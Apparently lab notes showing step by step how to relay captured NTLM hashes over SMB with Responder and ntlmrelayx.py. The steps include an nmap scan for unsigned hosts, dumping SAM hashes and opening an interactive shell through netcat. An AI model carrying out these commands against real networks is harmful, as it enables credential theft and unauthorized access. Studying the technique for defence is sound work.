Instead of cracking Hashes gathered with responder, we can instead relay those hashes via SMB to specific machines and potentially gain access.

Requirements

#Edit the Responder config file turn off SMB and HTTP
sudo nano /etc/responder/Responder.conf

Untitled

#Identify the hosts without SMB signing
nmap --script=smb2-security-mode.nse -p 445 -Pn 10.10.10.0/24

Untitled

Save the hosts ip address to a file which are disabled with SMB signing, and start the responder.

#Setup your relay
sudo ntlmrelayx.py -tf targets.txt -smb2support

Trigger an Event.

Untitled

Once the event occured, it started capturing the SAM hashes.

Untitled

#Interactive mode
sudo ntlmrelayx.py -tf targets.txt -smb2suppourt -i

Untitled

Use netcat to gain shell

nc 127.0.0.1 11000

Now i can acces the files and folders in the drive.

Untitled